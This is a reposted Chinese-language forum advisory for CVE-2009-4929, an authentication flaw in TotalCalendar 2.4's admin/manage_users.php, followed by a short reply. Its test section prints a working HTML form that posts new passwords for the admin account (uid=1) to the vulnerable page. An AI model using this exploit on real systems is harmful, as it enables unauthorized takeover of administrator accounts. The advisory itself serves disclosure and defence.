首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[转帖]TotalCalendar manage_users.php页面非授权更改口令漏洞
发表于: 2010-7-14 22:22 2677

[转帖]TotalCalendar manage_users.php页面非授权更改口令漏洞

freebsdlin 活跃值
2010-7-14 22:22
2677
受影响系统:
SweetPHP TotalCalendar 2.4

描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 34619
CVE ID: CVE-2009-4929

TotalCalendar是一种基于Web的日程管理系统。

TotalCalendar的admin/manage_users.php页面没有强制管理认证,远程用户可以通过在HTTP请求中包含newPW1和newPW2参数任意更改口令。

<*来源:ThE g0bL!N
  
  链接:0bfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5%4g2F1K9h3q4Q4x3X3g2U0L8$3#2Q4x3V1k6S2k6s2k6A6M7$3!0J5K9h3g2K6i4K6u0r3x3K6b7^5x3U0b7`.
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<title> Powered by: TotalCalendar 2.4 Remote Password Change </title>
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
   
    </tr>
  </table>
  </td>
   </tr>
   <tr>
     <td style="padding: 0px;">
  <table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
    <tr>
  
   <td height="100%" style="padding: 0px;">
<div align="left" id="25_content_area" style="">
  <script language="javascript">
  // Should we show the pw changing fields or not
  function pwChanger(bool)
  {
   if(bool)
   {
    // Show password changer
    document.getElementById('pwChange').style.display = "none";
    document.getElementById('pwDontChange').style.display = "";
    document.getElementById('pwChangerArea').style.display = "";
    document.getElementById('changePW').value = 1;
   }
   else
   {
    // Hide password changer
    document.getElementById('pwChange').style.display = "";
    document.getElementById('pwDontChange').style.display = "none";
    document.getElementById('pwChangerArea').style.display = "none";
    document.getElementById('changePW').value = 0;
   }
  }
  </script>
  <br /<br /><br /><form method="POST" action="http://7c5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6U0j5h3I4W2L8X3c8S2M7W2)9J5c8X3q4V1L8h3W2F1i4K6u0r3L8h3q4F1j5h3N6W2i4K6g2X3N6i4y4W2M7Y4y4Q4x3X3g2H3K9s2l9`."><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
  <table align="center">
    <tr>
      <td align="right" valign="top"><b>First Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Last Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Username:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Email Address:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="email" value="x0q@hotmail.fr" size="40" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChange">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
    </tr>
    <tr id="pwDontChange" style="display: none;">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChangerArea" style="display: none;">
      <td colspan="3">
   <table width="100%">
     <tr>
    <td align="right" valign="top"><b>New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
     </tr>
     <tr>
    <td align="right" valign="top"><b>Confirm New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
     </tr>
     <tr>
    <td colspan="3"> </td>
     </tr>
   </table>
      </td>
    </tr>
    <tr>
      <td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
    </tr>
  </table></form><br /></div></td>

建议:
--------------------------------------------------------------------------------
厂商补丁:

SweetPHP
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

a6dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4%4k6h3g2@1M7r3S2H3i4K6u0W2j5$3!0E0i4K6u0r3L8Y4g2C8k6g2)9J5c8X3#2G2k6s2g2D9k6i4y4Q4x3X3g2H3K9s2m8Q4x3@1k6F1j5h3#2W2i4K6y4p5f1$3y4J5K9i4m8@1i4K6g2X3f1s2u0W2N6X3W2W2N6#2)9J5y4Y4y4U0M7X3W2H3N6q4)9K6c8o6p5J5

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (1)
寻找奇点
雪    币: 238
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
这么低级的漏洞居然也要犯...
2010-7-15 20:46
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回